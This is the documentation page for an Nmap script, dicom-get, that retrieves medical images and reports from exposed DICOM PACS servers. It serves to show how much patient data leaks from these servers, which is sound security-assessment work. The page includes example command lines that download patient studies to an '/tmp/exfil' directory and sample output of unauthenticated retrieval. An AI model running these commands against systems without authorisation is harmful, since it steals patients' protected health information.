Script dicom-get
Script types:
portrule
Categories:
discovery, intrusive
Download: https://svn.nmap.org/nmap/scripts/dicom-get.nse
Script Summary
DICOM C-GET image retrieval and data exfiltration proof-of-concept.
Downloads DICOM instances (images, reports, structured reports) from a PACS via C-GET, saving them to disk as .dcm files. This demonstrates the real-world impact of an exposed DICOM Q/R service: not just that patient data is visible (as shown by dicom-cfind-ls), but that it can be fully exfiltrated.
The workflow mirrors what a legitimate DICOM SCU does: 1. C-FIND at STUDY level to discover studies (or use a known StudyInstanceUID) 2. C-GET at STUDY/SERIES/IMAGE level to retrieve instances 3. For each instance, the SCP sends a C-STORE sub-operation on the same association; this script acts as a mini-SCP, receiving and saving each file
C-GET is preferred over C-MOVE because it works on the same association -- no need for the target to connect back to us, and no need for our AE to be registered in the PACS modality list.
Downloaded files retain the original DICOM dataset bytes and are valid .dcm files (with a Part 10 header prepended) that can be opened in any DICOM viewer (Horos, RadiAnt, MicroDicom, etc.).
WARNING: This is an intrusive script. It downloads actual patient data (PHI/PII) from the target PACS. Only use against systems for which you have explicit written authorisation. Downloaded files must be handled according to applicable data protection regulations (HIPAA, GDPR, etc.).
Requires the dicom.lua library (place in nselib/ or same directory).
Script Arguments
- dicom-get.calling_ae
Our AE Title (default: "NMAP-GET")
- dicom-get.called_ae
Target AE Title (default: "ANY-SCP")
- dicom-get.patient_name
Patient name filter for C-FIND discovery (default: "*")
- dicom-get.part10
Prepend DICOM Part 10 header to saved files (default: true)
- dicom-get.save
Directory to save retrieved .dcm files (REQUIRED)
- dicom-get.study_uid
Specific StudyInstanceUID to retrieve (default: discover via C-FIND)
- dicom-get.info_model
Q/R information model: "study" or "patient" (default: "study")
- dicom-get.series_uid
Specific SeriesInstanceUID to retrieve (requires study_uid)
- dicom-get.patient_id
Patient ID filter for C-FIND discovery (default: "")
- dicom-get.max_pdu
Max PDU Length (default: 16384)
- dicom-get.timeout
DIMSE timeout in seconds (default: 30)
- dicom-get.max_instances
Max instances per study (default: 50)
- dicom-get.max_studies
Max studies to retrieve (default: 5)
- dicom-get.level
Retrieval level: "STUDY", "SERIES", "IMAGE" (default: "STUDY")
- dicom-get.modality
Modality filter for C-FIND discovery (default: "")
- dicom.called_aet, dicom.calling_aet
See the documentation for the dicom library.
Example Usage
nmap -p 4242 --script dicom-get \ --script-args 'dicom-get.called_ae=ORTHANC,dicom-get.calling_ae=LAUNCHER,dicom-get.save=/tmp/exfil' <target>
# Retrieve a specific study by UID nmap -p 4242 --script dicom-get \ --script-args 'dicom-get.called_ae=ORTHANC,dicom-get.study_uid=1.2.3.4.5,dicom-get.save=/tmp/exfil' <target>
# Retrieve only 3 studies, up to 5 instances each nmap -p 4242 --script dicom-get \ --script-args 'dicom-get.called_ae=ORTHANC,dicom-get.max_studies=3,dicom-get.max_instances=5,dicom-get.save=/tmp/exfil' <target>
Script Output
PORT STATE SERVICE 4242/tcp open dicom | dicom-get: | Target AE: ORTHANC Calling AE: LAUNCHER | Studies discovered: 2 (via C-FIND) | Retrieved: | Study 1.2.826...514 - Doe^John (PT_STRATIGOS_EC2_001) | Saved: 101 instances (12.4 MB) | Study 1.2.826...514 - Doe, John (1) | Saved: 101 instances (12.4 MB) | Total: 202 instances, 24.8 MB saved to /tmp/exfil | WARNING: Patient data downloaded without authentication |_
Requires
Author:
License: Same as Nmap -- See https://nmap.org/book/man-legal.html
action
- action (host, port)
-
MAIN ACTION
Parameters
- host
- port
